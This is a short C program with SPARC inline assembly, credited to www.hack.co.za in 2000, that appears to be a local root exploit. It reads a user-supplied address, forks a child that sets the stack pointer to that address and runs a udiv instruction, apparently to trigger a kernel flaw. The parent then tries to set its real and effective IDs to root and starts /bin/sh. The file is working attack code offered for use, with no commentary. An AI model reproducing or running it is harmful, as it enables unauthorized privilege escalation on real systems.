#include <stdio.h>

unsigned long addr;
unsigned long *pp;

char buf[BUFSIZ];

main(argc, argv)
int argc;
char **argv;
{

  printf("enter address in hex\n");
  gets(buf);
  sscanf(buf, "%x", &addr);
  addr -= 32;

  pp = (unsigned long *) addr;
  printf("address is 0x%0.8x\n", addr);

  if (fork() == 0)
    {
      asm("   sethi   %hi(_addr), %i4");
      asm("   ld      [%i4+%lo(_addr)], %i4");
      asm("   nop");
      asm("   mov     %i4, %sp");
      asm("   udiv    %i2, %i7, %i2");
      asm("   nop");
      exit(0);
    }
  else
    {
      wait((int *) 0);
      setreuid(-1, 0);
      setregid(-1, 0);
      system("/bin/sh");
      exit(0);
    }

}
/*                    www.hack.co.za              [2000]*/